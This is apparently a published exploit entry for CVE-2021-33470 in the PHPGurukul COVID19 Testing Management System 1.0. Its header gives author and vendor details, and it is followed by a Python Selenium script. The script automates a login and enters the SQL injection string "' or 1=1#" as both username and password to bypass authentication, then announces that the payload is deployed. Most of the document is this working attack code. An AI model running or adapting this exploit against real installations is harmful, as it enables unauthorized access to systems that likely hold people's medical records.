# Exploit Title: COVID19 Testing Management System 1.0 - SQL Injection (Authentication Bypass) # Author: @nu11secur1ty # Testing and Debugging: @nu11secur1ty # Date: 06.08.2021 # Vendor: https://phpgurukul.com/covid19-testing-management-system-using-php-and-mysql/ # Link: https://phpgurukul.com/covid19-testing-management-system-using-php-and-mysql/ # CVE: CVE-2021-33470 # Proof: https://github.com/nu11secur1ty/CVE-mitre/blob/main/CVE-2021-33470/CVE-2021-33470.gif [+] Exploit Source: #!/usr/bin/python3 # Author: @nu11secur1ty # Debug: @nu11secur1ty # CVE: CVE-2021-33470 from selenium import webdriver import time #enter the link to the website you want to automate login. website_link=" http://192.168.1.160/Covid19-TMS%20Project%20Using%20PHP%20and%20MySQL/covid-tms/login.php " #enter your login username SQL bling injection username="nu11secur1ty' or 1=1#" #enter your login password SQL bling injection password="nu11secur1ty' or 1=1#" # test and proof the SQL injection # user: admin # password: password #enter the element for username input field element_for_username="username" #enter the element for password input field element_for_password="inputpwd" #enter the element for submit button by class element_for_submit="btn.btn-primary.btn-user.btn-block" #browser = webdriver.Safari() #for macOS users[for others use chrome vis chromedriver] browser = webdriver.Chrome() #uncomment this line,for chrome users #browser = webdriver.Firefox() #uncomment this line,for chrome users browser.get((website_link)) try: username_element = browser.find_element_by_name(element_for_username) username_element.send_keys(username) password_element = browser.find_element_by_name(element_for_password) password_element.send_keys(password) time.sleep(3) signInButton = browser.find_element_by_class_name(element_for_submit) signInButton.click() print("payload is deployed NOW, you have SQL Authentication Bypass =)...\n") except Exception: #### This exception occurs if the element are not found in the webpage. print("Some error occured :(")